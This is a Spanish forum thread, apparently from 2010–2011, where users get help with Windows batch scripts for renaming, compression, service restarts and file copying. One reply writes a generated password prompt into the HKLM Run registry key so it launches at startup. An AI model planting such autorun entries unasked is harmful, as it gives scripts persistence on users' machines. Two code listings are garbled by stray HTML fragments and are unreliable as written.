echo          =          =
echo          =          =
echo          =          =
echo          =====

:data

set /p Historia=Escriba el numero de historia:

set /p Ojo=Escriba el tipo de ojo:

echo          =====
echo          Los datos son correctos?
echo          Numero de historia: %Historia%
echo          Tipo de ojo: %Ojo%
echo          =====

set /p respuesta=1 es Si, 2 es NO:

if %respuesta% EQU 1 (goto :renombrar) else (goto :data)

:renombrar
set contador=0
```

pause

gracias

[illegible]

```

11.
12.      :data
13.
14.
15.      set /p Historia=Escriba el numero de historia:
16.
17.      set /p Ojo=Escriba el tipo de ojo:
18.
19.      echo =====
20.      echo          Los datos son correctos?
21.      echo          Numero de historia: %Historia%
22.      echo          Tipo de ojo: %Ojo%
23.      echo          =====
24.
25.      set /p respuesta=1 es Si, 2 es NO:
26.
27.      if %respuesta% == 1 (goto :renombrar) else (goto :data)
28.
29.
30.
31.
32.      :renombrar
33.      set contador=0
34.
35.
36.      for /F "tokens=1,4*" %%i in ('dir') do (
37.          set /a contador=!contador!+1
38.
39.          echo %%j %%k !Historia!_%<span<
            span="" style="color: black !important;"> style="color:
            #448888;">Ojo</span><%_!contador!_%<span< span=""
            style="color: black !important;"> style="color:
            #448888;">i</span>< .txt
40.          )
41.
42.
43.      pause

```

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: robrey26604 en 31 Mayo 2010, 22:16

Tengo el siguiente código para encontrar y borrar farchivos que no se pueden borrar porque quedaron enganchados

Código:

Código

```
1. @echo off
2. echo Este programa borra archivos que no se dejan borrar
   porque
3. echo quedaron enganchados,por ejemplo videos, etc.
4. set /p archivo="Nombre del Archivo>>"
5. rem Roberto Fernández Rey
6. for %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y
   z) do (
7. dir /b %%i:\ > nul 2>&1 && (
8. for /f "tokens=*" %%_ in ('dir /b /s %%i:%archivo%') do (if
   exist %%_ (
9. taskkill /f /im explorer.exe && (del /f /q "%%_" && (start
   explorer.exe))))))
10. exit /b 0
11.
```

el código busca el archivo y lo elimina pero sucede que no puedo quitar la flash de F: a no ser que le aplique manualmente taskkill al explorer.exe y despues start una vez mas.

que será?

gracias

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Leo Gutiérrez.** en **31 Mayo 2010, 23:00**

¿A qué te refieres con "enganchados"?

¿La flash?

¿Cómo?

Explicate mejor.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **robrey26604** en **1 Junio 2010, 14:31**

Gracias Leo por tu tiempo y ayuda.

Me refiero a enganchado a que cuando traté de liberar la flash para desconectarla de forma segura, me indicó que estaba un proceso en curso en ella y por eso no podía ser liberada y que tenía que ver con el explorer. Pienso que puede ser un problema de tiempo, que al aplicar taskkill y no dar un tiempo para eso puede provocar problemas, mi máquina no es muy rápida que digamos, esa es una idea mía pero no estoy seguro de este razonamiento. Cuando le di taskkill, manualmente y start al explorer (manualmente) el proceso terminó y pude sacar la flash. El video que quería borrar estaba en el disco duro y en la flash.

Gracias.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Leo Gutiérrez.** en **11 Junio 2010, 20:58**

Pueden ser muchas cosas, desde el explorador que esté usando la memoria, o simplemente te encuentres con CD o chdir en la memoria.

Coloca el código.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **FJPPitta** en **15 Julio 2010, 18:47**

Hola que tal,

estaba revisando el post ya que estoy haciendo un batch para comprimir archivos con el 7zip de forma que me comprima cada documento en un archivo .7z separado, el caso es que tengo el problema que el nombre de archivo lo arrastra con la extensión, si tengo:

documento.doc

le aplico el batch y queda

document.doc.7z

como puedo quitar el .doc del comprimido, para comprimir uso:

Código:

```
for %%a in (*.wad) do "%MYFILES%\7z.exe" a -t7z "%%a".7z "%%a" -mx9 -bd
```

vi que en un ejemplo pueden quitar lo ultimos 3 caracteres de una variable pero no me funciona, saben como podria hacerle ya sea en esa linea o despues de la ejecución del comando.

Tambien quisiera saber si es posible agregar un log de tiempo a cada archivo comprimido para que dentro de mi 7z tenga documento.doc y fecha.log, el .log creado al momento de la ejecución del .bat

De antemano gracias

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Leo Gutiérrez.** en **15 Julio 2010, 21:20**

Intenta así:

Código

```
1. for %%a in (*.wad) do (  
2.     "%MYFILES%\7z.exe" a -t7z "%%~na".7z "%%a" -mx9 -bd  
3. )
```

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **FJPPitta** en **15 Julio 2010, 21:48**

Muchas gracias Leo Gutierrez funciona a la perfección habia intentado ponerle el ~n pero lo hacia %%%a~n por eso no quedaba.

Que buena solución

Saludos y buen día

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **FJPPitta** en **20 Julio 2010, 23:55**

Ya entrando en mas detalles tengo una duda que me inquieta, es posible hacer un barrido de letra por letra del nombre de un fichero algo así como que de un archivo abcd.txt me indique las letras existentes a b c d y pueda hacer un cambio similar a a=1, b=2 c=3 d=4 y luego renombrar automaticamente a 1234.txt o si el archivo se llama bcda.txt se renombre a 2341.txt

Saludos y gracias por la información del post, ha sido realmente muy valiosa para automatizar algunas de mis tareas diarias.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Leo Gutiérrez.** en **21 Julio 2010, 01:25**

[Cita de: FJPPitta en 20 Julio 2010, 23:55](#)

Ya entrando en mas detalles tengo una duda que me inquieta, es posible hacer un barrido de letra por letra del nombre de un fichero algo así como que de un archivo abcd.txt me indique las letras existentes a b c d y pueda hacer un cambio similar a a=1, b=2 c=3 d=4 y luego renombrar automaticamente a 1234.txt o si el archivo se llama bcda.txt se renombre a 2341.txt

Saludos y gracias por la información del post, ha sido realmente muy valiosa para automatizar algunas de mis tareas diarias.

code.bat

Código

```
1. @echo off
2. setlocal enabledelayedexpansion
3. rem Checar si el usuario usó bien el .bat
4. if ["%1"]==[""] (
5.     echo Error con argumentos.
6.     exit /b 1
7. )
8. rem Checar si el archivo existe:
9. if not exist "%1" (exit /b 1)
10. set "word=%~n1";
11. set "temp=%word%";
12. rem Calcular la longitud de cadena y almacenarlo en una
    variable
13. set /a contador=0
14. :loop
15.     if not defined word (goto:end)
16.     set "word=%word:~1%";
17.     set /a contador+=1
18.     goto:loop
```



```

19.      :end
20.          set /a contador-=1
21.          set "final=";
22.          for /l %%_ in (0, 1, %contador%) do (
23.              call:alpha !temp:~%<span< span=""
                style="color: black !important;"> style="color:
                #448888;"></span>>%%_, 1!
24.              set "final=!final!!alpha!";
25.          )
26.          ren "%1" "%final%.txt"
27.          goto:eof
28.      :alpha
29.      set /a contador=0
30.      for %%_ in (
31.          a b c d e f g h i j k l m n o p q r s t u v w x y
32.          z
33.          ) do (
34.              set /a contador+=1
35.              if "%1"=="%%_" (
36.                  set "alpha=!contador!";
37.              )
38.          goto:eof
39.

```

Código:

```
C:\>echo.> abcd.txt
```

```
C:\>dir /b *.txt
abcd.txt
```

```
C:\>code.bat abcd.txt
```

```
C:\>dir /b *.txt
1234.txt
```

```
C:\>
```

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: FJPPitta en 21 Julio 2010, 16:03

Realmente increíble no pense que se pudiera hacer tanto con un batch, muchas gracias voy a examinar el código para enterderle, ajustarlo a mis necesidades e incluirlo en un script mas grande.

EDITO:

Fijate que no entiendo muy bien algunas partes

Aqui de una lista de numeros que va de 0 a la longitud de la cadena ,
entiendo que por cada posición llama a la funcion alpha para que
sustituya cada letra por el numero correspondiente

lo que no entiendo es el %%_ es solo una variable como podria ser
%%a?

el llamado a la funcion por que se coloca entre "!" es para que
unicamente pase 1 caracter a la funcion?

y set "final=!final!!alpha!"; suma caracter por caracter para formar al
final la cadena ?

```
for /l %%_ in (0, 1, %contador%) do (  
    call:alpha !temp:~%%_, 1!  
    set "final=!final!!alpha!";  
)
```

ya todo lo demas si me queda claro ya hice pruebas y todo va perfecto.

Saludos

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Leo Gutiérrez.** en **21 Julio 2010, 22:10**

Citar

lo que no entiendo es el %%_ es solo una variable como podria ser %%a?

Así es, pude haberle puesto %%# ó %%j, pero quise %%_, es solo
cuestión de gustos.

Citar

el llamado a la funcion por que se coloca entre "!" es para que unicamente pase 1
caracter a la funcion?

Sí. Se manda el carácter a la función y se hace el proceso de verificar
qué posición ocupa en el alfabeto.

Citar

set "final=!final!!alpha!"; suma caracter por caracter para formar al final la cadena ?

Sí, se suma o concatena.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **FJPPitta** en **21 Julio 2010, 22:42**

Gracias es que entre los %% y los !! me confundia pero ya todo esta mas claro, el programa que estoy haciendo ya va tomando forma.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **sabrita** en **23 Agosto 2010, 21:14**

pff la verdad yu no entiendo nada

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Leo Gutiérrez.** en **24 Agosto 2010, 01:40**

[Cita de: sabrita en 23 Agosto 2010, 21:14](#)
pff la verdad yu no entiendo nada

¿pff?
¿yu?

¿Qué edad tienes, 10 años?, aprende a escribir.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **FJPPitta** en **15 Septiembre 2010, 07:30**

hola que tal, aqui dando lata de nuevo

¿cómo puedo guardar un argumento?

en este caso una extensión específica

archivo.bat doc

significa que realizo un proceso con todos los .doc que encuentre en el directorio realizo bien las funciones al inicio con un

Código:
`for %%a in (*. "%1) do (instrucciones)`

pero mas adelante ejecuto una llamada a funcion pero no puedo utilizar el %1 ya que esta asignado al primer parametro de la funcion, entonces como puedo guardarlo en una variable para usarlo dentro de mi funcion

trate con

Código:

```
set %ext=%1  
set %ext%=%1  
set ext=%1
```

pero me deja la variable ext vacia, tambien intente con el set /a
ext=%1 y sigue estando vacia o si no me pone ext

de antemano gracias

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Leo Gutiérrez.** en **15 Septiembre 2010, 19:32**

No te he entendido.

¿El argumento lo pasas desde el cmd.exe?

¿O de una etiqueta a otra?

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **FJPPitta** en **16 Septiembre 2010, 01:02**

espera aunque despues de una cocacola ya pude pensarlo mejor :xD ,
lo que pasa es que no estaba asignando bien la variable la debo asignar

debe quedar así

Código:

```
set "ext=%1"
```

y luego en la linea donde ocupo la variable

Código:

```
ren "%~n1%~x1" "%temp%". "%ext%"
```

y así ya puedo almacenar un argumento y usarlo dentro de una funcion

Muchas gracias por la atención y disculpa la molestia es que llevaba un
par de días dandole vueltas a esto y apenas se me prendió el foco

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **astral_153** en **1 Octubre 2010, 01:47**

[Cita de: astral_153 en 30 Septiembre 2010, 03:09](#)

Es posible crear un asistente de Actualizacion automatica desde Batch??

al igual que las actualizaciones automaticas de windows, este archivo deberia descargar las actualizaciones o archivos de un servidor de internet y guardarlos en una carpeta pre determinada..

Nota: soy nuevo en batch..

Si alguien puede ayudarme con este codigo..

Gracias de antemanos.. ;D

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: **Leo Gutiérrez.** en **1 Octubre 2010, 02:33**

Sí, sí se puede descargar algo desde una web, pero no con comandos nativos de Windows.

Probablemente tengas que utilizar get.exe o wget.exe, o iopus file downloader.

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: **astral_153** en **2 Octubre 2010, 02:05**

Whooo genial funciona perfectamente ;-)
con el **Wget.exe**

Gracias ;D ;-) ;-) ;-)

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: **Christianlej** en **5 Noviembre 2010, 01:36**

Hola me gustaria saber como cierro un programa "firefox.exe" en 1 minuto despues de haberlo habierto del mismo archivo bat: probe esto pero no me funciona. Y quiero que al abrir el programa con el bat se me cierre en 30 minutos automaticamente sin yo decirle nada.

@echo off
title Cerrar Programas/a
color 0b
mode con cols=80
mode con lines=6
:prog

```

cls
echo.
set /p variable2=firefox.exe (aqui pongo el programa que deseo cerrar)
:clock
echo.
set /p variable=0:34 (aqui introduzco la hora a la que quiero cerrar el
programa)
if %time:~0,5%:%time:~6,2% == %variable% (goto 1) else goto 2
:1
taskkill /s 127.0.0.1 /f /im %variable2%
goto ok
:2
cls
echo.
echo.
if %time:~0,5%:%time:~6,2% == %variable% (goto 1) else goto 2
goto 2
:ok
cls
echo.
echo Programa cerrado!!
pause=1
goto prog

```

La ayuda sera muy valorada. Gracias!! :huh:

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **P3NDULO** en **8 Noviembre 2010, 21:39**

buenas, yo estoy tratando, o mejor dicho pensando en hacer un .bat..
queee.

Pueda copiar de un equipo a otro, o mejor dicho, que desde mi maquina
puedo hacer una copia a varios equipos al mismo tiempo.

inicie con esto pero me perdi jijiji, esto solo lo que hace es copiar un txt
en una carpeta..

@echo off

@set/p maq= Ingrese nombre de maquina:

@set/p unidad= Ingrese Letra de unidad de destino:

cd C:\Documents and Settings\COELHO\Escritorio\nueva

dir /ad /b /on > dir.txt

for /f %%%e in (dir.txt) do set user=%%e & xcopy "C:\Documents and
Settings\%%e\Escritorio" "%unidad%\%maq%\%%e\Escritorio" /E /H

```
/R /I /F /Y & xcopy "C:\Documents and Settings\%%e\Mis documentos"  
"%unidad%:\%maq%\%%e\Mis Documentos" /E /H /R /I /F /Y  
@Pause>Nul
```

y tambien, creo que por hay ley, que tenfria que ponerle el usuario de administrador de la red =)... si me pueden ayudar....

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: luis_fonde en 28 Noviembre 2010, 17:46

alguien me puede ayudar a hacer esto:

A crear un script que entre tantos nombres como queramos por parámetro i que los muestre ordenados de menor a mayor.

gracias.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 3 Diciembre 2010, 01:53

Muestra tus avances y yo te ayudo.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: FJPPitta en 8 Diciembre 2010, 23:48

Muy bueno lo del wget.exe ya le estoy hechando un ojo así como para hacer una mini aplicación en batch y actualizarla via web.

Yo ya estoy agarrando más practica en estas cosas, con un compilador batch ya se puede hacer algo decente.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: FJPPitta en 9 Diciembre 2010, 18:14

Aqui otra vez dando lata,

Se me ha ocurrido hacer un reporte de archivos (si aquellos que alguna vez comprimí) y guardarlo en un TXT

Código:

```
for %%a in (*.doc) do  
(
```

```
set /a archivo = "%a"
set /a contador = !contador! + 1
echo !contador! !archivo! >>reporte.txt
7z.exe a -t7z "%~na".7z "%~na".doc -mx9 -bd>nul
REM otros comandos . . .
)
```

En general es esta parte del código, genero un pequeño medidor de porcentaje y en la parte:

Código:

```
echo !contador! !archivo! >>reporte.txt
```

Me guarda en el archivo solo el número de contador así, lo siguiente es las primeras letras del nombre hasta antes de un espacio

Código:

```
1
2
3
4
5
```

Trato de poner directo %~na pero no me queda en blanco ya que solo quiero poner el nombre del archivo sin extensión.

si coloco set /a nombre = %~na me dice uso del operador no valido

Saludos

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Leo Gutiérrez.** en **10 Diciembre 2010, 02:04**

Pon el código con GeShi o eliminaré tu mensaje.

Las reglas están para algo.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **FJPPitta** en **10 Diciembre 2010, 17:02**

ya esta, pense que lo habia hecho pero por las prisas no le di visualizar

Saludos

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **FJPPitta** en **10 Diciembre 2010, 20:38**

Ya encuentre el fallo

debe quedar así:

Código:

```
for %%a in (*.doc) do
(
    set /a contador = !contador! + 1
    echo !contador! %%~na >>reporte.txt
    7z.exe a -t7z "%%~na".7z "%%~na".doc -mx9 -bd>nul
    REM otros comandos . . .
)
```

Quería almacenarlo en una variable, pero al parecer va mejor directo.

Estoy trabajando en enviar el reporte por correo electrónico, apenas termine las pruebas pongo el dato por si a alguien le sirve.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **xassiz~** en **10 Diciembre 2010, 21:25**

No es que vaya peor, es que te comiste un porcentaje:

Código

```
1.  for %%a in (*.doc) do
2.  (
3.      set /a archivo = "%a"
4.      set /a contador = !contador! + 1
5.      echo !contador! !archivo! >>reporte.txt
6.      7z.exe a -t7z "%%~na".7z "%%~na".doc -mx9 -bd>nul
7.      REM otros comandos . . .
8.  )
9.
```

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **FJPPitta** en **10 Diciembre 2010, 23:35**

Si me equivoque en la sentencia pero con:

Código:

```
set file=%~na
```

puedo asignar el nombre de un archivo a la variable file utilizando doble porcentaje, y para guardarlo en un txt solo le puse

Código:

```
echo !contador! : !file! >>reporte.txt
```

asi le pongo un contador y el nombre del archivo y los voy guardando :D

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **FJPPitta** en **14 Diciembre 2010, 21:20**

Tengo una duda, de una lista de archivos es posible cuyos nombres en ocasiones se incluyen caracteres como un ! e posible localizar dichos archivos y renombrarlos cambiando el ! por un espacio o cualquier otra cosa?

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **xassiz~** en **14 Diciembre 2010, 22:05**

Código

```
1. @echo off
2.
3. set "archivo=test!.txt"
4.
5. set/a contador=0
6.
7. :loop
8. call set letra=%archivo:~%contador%,1%%
9. if "%letra%"=="!" (set boolean=true)
10.    set/a contador+=1
11.    if defined letra (goto:loop)
12.
13.    if "%boolean%"=="true" (echo:rename %archivo%
    %archivo:!=%) else (echo:No tiene !)
14.
15.    >nul pause
16.    exit
```

::)

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Edo_Degauss** en **3 Enero 2011, 20:14**

Saludos a todo tengo una duda en cuanto a programacion en BATCH

resulta que tengo que hacer una rutina que la tengo lista pero no se como terminar lo ultimo que me queda.

La 1era parte consiste en que el batch hace un BACK UP de la base de datos y me la comprime ..

La 2da parte la sube a un FTP

Pero necesito que todo esto se haga en uno solo , osea termina de comprimir el Backup y lo empieze a subir al FTP

el problema que tengo es que despues de que hace el back up y empieza a comprimir se ejecuta y empieza a subirse, por ende error por que todavia no termina la compresion y se ejecuta la uplodeada..

el codigo que tengo es este

back up - rar

```
set FECHA= %date%  
set FECHA=%FECHA:/=%
```

```
SQLCMD -SEDO\SQL2K8CS -E -i"C:\Users\---\Desktop\backup.sql" >>  
"C:\logs\Backup%FECHA%.log"
```

```
Start winrar a -dr -ep1 "BK.rar" C:\test\*.*
```

Sube al FTP

```
set FECHA= %date%  
set FECHA=%FECHA:/=%
```

```
ftp -s:batch-ftp.txt ftp.acquire.com.au  
>> "C:\logs\details_upload%FECHA%.log"
```

```
cd C:\Documents and Settings\ecabello\Desktop  
del "BK.rar"
```

habia intentado hacerlo todo desde un BAT y conseguí esto

```
call c:\Users\--\Desktop\backup.bat
```

```
:start  
PING -a 127.0.0.1 >nul
```

```
:batch2  
call c:\Users\--\Desktop\batch.bat
```

```
if exist "C:\test\BK.bak"
```

```
(GOTO start)
```

```
if not exist "C:\test\BK.bak"
```

```
(GOTO batch2)
```

Pero todavía no termina el rar y ya se ejecuta para subirlo..

mis preguntas son

Hay alguna forma de que se detecte cuando termine el rar?
o de como solucionarlo..

Agradecería mucho su ayuda desde ya..

gracias de antemano

Intenta usando Start con el parametro /wait

Cambia

Código:

```
Start winrar a -dr -ep1 "BK.rar" C:\test\*.*
```

por

Código:

```
Start /wait winrar a -dr -ep1 "BK.rar" C:\test\*.*
```

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: **aaronezpino** en **3 Febrero 2011, 20:07**

Hola

Necesito programar un archivo bat que me haga lo sig...

Preguntar una cadena de hora (cuatro digitos, formato HHMM) , una vez hecho esto, que renombre "archivo1" a "nombre1HHMM", "archivo2" a "nombre2HHMM".

Usé el sig código...

Código

1. @echo off
2. set /p HHMM = Escribe la hora formato HHMM
3. ren C:\archivo1.png %nombre1HHMM%.png
4. pause

ya lo intenté con los sig cambios en el renglón 3.

Código:

```
%nombre1HHMM%.png  
nombre1HHMM.png  
nombre1%HHMM%.png  
%nombre1HHMM.png%
```

y no funciona.

¿Alguien sabe como le puedo hacer?

Saludos

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 3 Febrero 2011, 21:19

Primero debes decirnos de donde sacaremos los archivos "archivo1", "archivo2", etc.

¿Los da el usuario con set /p, los cogemos del directorio actual, o simplemente están seteados en el código?

Otra cosa, los código deben ir con su correspondiente etiqueta, de no ser así tu mensaje será eliminado.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: DameBanda en 27 Febrero 2011, 12:37

Hola TxShack

La respuesta a porque no funciona es facil:

Porque si te fijas en tu code pones

Código:

```
if %clave%==fark (goto bien) else goto :menu
```

me parece que para que funcionase bastaría con quitarle los 2 puntos a :menu y meterlo entre paréntesis. Para que hagas copy-paste te dejo el code de forma que funcione.

Lo que no tengo ni idea es de si se puede bloquear la X...

Código:

```
@echo off
cd c:\
echo @echo off > pass.bat
echo :menu >> pass.bat
echo echo. >> pass.bat
echo INTRODUCIR CLAVE >> pass.bat
echo echo. >> pass.bat
echo set /p clave= >> pass.bat
echo if %clave%==fark (goto bien) else goto :menu >> pass.bat
echo :bien >> pass.bat
echo cls >> pass.bat
echo echo. >> pass.bat
echo echo ACCESO VALIDADO >> pass.bat
echo echo. >> pass.bat
echo pause >> pass.bat
echo exit >> pass.bat
reg add HKLM\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run /v pass /d
C:\pass.bat
start c:\pass.bat
exit
```

Creo que así te funcionaría aunque seria mejor crear 2 archivos puesto que al introducir ciertos caracteres en un batch manda error... :-\

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Leo Gutiérrez.** en **27 Febrero 2011, 17:46**

Los puntos no afectan, lo que afecta es el uso o no de los paréntesis, usenlos.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **MrDJcKMC** en **19 Marzo 2011, 12:10**

Buenisimo!!
Será un post comenzado hace mucho, pero es muy bueno.
Gracias men!

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **imillan** en **17 Mayo 2011, 16:44**

[Cita de: MrDJcKMC en 19 Marzo 2011, 12:10](#)

Buenisimo!!
Será un post comenzado hace mucho, pero es muy bueno.
Gracias men!

La verdad es que si llevo una hora buscando una solución a mi tema, que no he encontrado, seguro que esta por algún sitio, pero hay tantas cosas interesantes que no puedo pasar de la pagina actual.

Bueno hay va mi pregunta.

ME gustaría saber como hacer para levantar un servicio tirado pero solo cuando lo estuviera.

Hacer algo así, pero no se como

```
IF NET STATUS "Jusan Server" <> 'running' THEN NET START "Jusan Server"
```

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Leo Gutiérrez.** en **18 Mayo 2011, 04:51**

Es facil, solo habría que ver qué herramienta te devuelve la lista de procesos activos.

Creo que se puede con WMIC.

Código:
`wmic service list brief`

Peganos la salida del comando, luego dinos cual proceso debería de aparecer.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Novlucker** en **18 Mayo 2011, 05:15**

Estaba viendo esto :P
Código

```
1. for /f "tokens=*" %%a in ('sc query webclient | find /i /c  
    "running") do (  
2. IF %%a == 0 (sc start webclient))
```

He puesto webclient como ejemplo.

Saludos

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **dieboxxxx** en **27 Agosto 2011, 21:03**

Soy nuevo en el foro y me disculpan si violo alguna regla, pero la verdad necesito con urgencia que me ayuden con ese código; necesito borrar un archivo que contenga una cadena de texto específica; ejemplo, borrar archivos .ini que contengan la palabra "MusicAlbum" en todo el disco duro, muchas gracias por su ayuda.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Leo Gutiérrez.** en **27 Agosto 2011, 21:13**

[Cita de: dieboxxxx en 27 Agosto 2011, 21:03](#)

Soy nuevo en el foro y me disculpan si violo alguna regla, pero la verdad necesito con urgencia que me ayuden con ese código; necesito borrar un archivo que contenga una cadena de texto específica; ejemplo, borrar archivos .ini que contengan la palabra "MusicAlbum" en todo el disco duro, muchas gracias por su ayuda.

¿El archivo dónde se encuentra?

El usuario da el archivo a borrar o se tiene que buscar antes?

Da más datos si quieres que se te ayude.

¿por qué la urgencia?

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **almacenero** en **7 Noviembre 2011, 11:38**

Muchísimas gracias sirdarckcat. Un tuto cojonudo.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **pablgonz** en **23 Noviembre 2011, 04:11**

Hola a todos, soy nuevo en el foro (lo leía pero no estaba registrado) tengo una duda habitual en la red sobre FOR y rename, pero, esta es para una cadena de archivos específica (la idea es hacerlo con la línea de comando y no con programas externos) va así, estoy dentro del directorio temp, y en el hay un sub directorio imágenes, en este directorio tengo una serie de archivos de la siguiente forma
Código

```
1. name-tmp-000001.ppm, name-tmp-000002.ppm, name-tmp-000003.ppm, ...
```

donde name puede ser cualquier carácter (alfanumérico,_,etc.) y -tmp- siempre esta presente, lo que deseo es re nombrarlos para que queden así:

Código

```
1. name-tmp-1.ppm, name-tmp-2.ppm, name-tmp-3.ppm, ...
```

usando FOR y rename, ¿es posible?, con una perl1línea se que puedo, pero, necesito saber como hacerlos (si es posible) desde la línea de comando, para poder incluirlo dentro de un script.

De Antemano muchas gracias

Pablo

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Leo Gutiérrez.** en **23 Noviembre 2011, 06:27**

El orden importa?

Es decir,

name-tmp-000001.ppm, name-tmp-000002.ppm, name-tmp-000003.ppm,...

podría quedar:

name-tmp-3.ppm, name-tmp-5.ppm, name-tmp-1.ppm,... ?

No importa que el nombre (name), no coincida con el número?

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **pablgonz** en **23 Noviembre 2011, 11:06**

Hola, gracias por la pronta respuesta, la verdad es que el orden importa:
Código

```
1. name-tmp-000001.ppm, name-tmp-000002.ppm, name-tmp-000003.ppm, ...
```

debería quedar:
Código

```
1. name-tmp-1.ppm, name-tmp-2.ppm, name-tmp-3.ppm, ...
```

algo como «truncar los ceros» (si es que se le puede llamar así), otro dato 000001.ppm es una cantidad fija de números, me explico, puedes ser eso o 000099.ppm o 000999.ppm, sucesivamente, es decir, es el contador del archivo pero completado con ceros hacia la izquierda. Gracias por la respuesta, a ver si me pueden ayudar con este problema.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Leo Gutiérrez.** en **24 Noviembre 2011, 01:18**

Teniendo estos archivos:

Código:

```
C:\Users\leo\batch\temp>dir /b
a-tmp-000001.ppm
b-tmp-000009.ppm
c-tmp-000006.ppm
e-tmp-000010.ppm
final.cmd
h-tmp-000004.ppm
j-tmp-000003.ppm
n-tmp-000002.ppm
otro.cmd
u-tmp-000008.ppm
x-tmp-000005.ppm
y-tmp-000007.ppm
z-tmp-000011.ppm
```

```
C:\Users\leo\batch\temp>
```

Luego de correr el script:

Código:

```
C:\Users\leo\batch\temp>final.cmd
```

```
C:\Users\leo\batch\temp>
```

Me queda así finalmente:

Código:

```
C:\Users\leo\batch\temp>dir /b
a-tmp-1.ppm
b-tmp-9.ppm
c-tmp-6.ppm
e-tmp-10.ppm
final.cmd
h-tmp-4.ppm
j-tmp-3.ppm
n-tmp-2.ppm
otro.cmd
u-tmp-8.ppm
x-tmp-5.ppm
y-tmp-7.ppm
z-tmp-11.ppm
```

```
C:\Users\leo\batch\temp>
```

El script es este:

Código

```
1. @echo off
2. setlocal enabledelayedexpansion
3. for /f "tokens=1,2,3 delims=-" %%a in ('dir /b *.ppm') do (
4.     set "string=%%c"
5.     set "string=!string:.ppm=!
```

```

6.     for /f "tokens=* delims=0" %%A IN ("%string%") do set
      string=%%A
7.     ren "%%a-%%b-%%c" "%%a-%%b-!string!.ppm"
8. )

```

Prueba si te funciona, saludos.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **pablgonz** en **24 Noviembre 2011, 02:23**

Hola de nuevo, gracias por responder, lamentablemente no me funciona, va así

Código

```

1. C:\testv3\testv3\temp\dir /b
2. cambia.cmd
3. test-tmp-000001.ppm
4. test-tmp-000002.ppm
5. test-tmp-000003.ppm
6. test-tmp-000004.ppm
7. test-tmp-000005.ppm
8.

```

luego de correr el script

Código

```

1. @echo off
2. setlocal enabledelayedexpansion
3. for /f "tokens=1,2,3 delims=-" %%a in ('dir /b *.ppm') do (
4.     set "string=%%c"
5.     set "string=!string!.ppm!"
6.     for /f "tokens=* delims=0" %%A IN ("%string%") do set
      string=%%A
7.     ren "%%a-%%b-%%c" "%%a-%%b-!string!.ppm"
8. )

```

resulta lo siguiente

Código

```

1. cambia.cmd
2. test-tmp-000001.ppm
3. test-tmp-000002.ppm
4. test-tmp-000003.ppm

```

- 5. test-tmp-000004.ppm
- 6. test-tmp-000005.ppm

Es decir, no efectúa el cambio indicado, quizás debí comentar que todos los ficheros tienen el mismo nombre, el cual deseo mantener, solo me interesa eliminar los ceros a la izquierda del contador, esperando su ayuda, se despide:
Pablo

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 25 Noviembre 2011, 17:51

Perdón por la tardanza.

Creo que ya funciona, el error era que en el for interno, estaba utilizando los caracteres %% para interpolar la variable, y tenía que ser !!.

Mira:

Código:

```
C:\Users\leo\batch\temp>dir /b
final.cmd
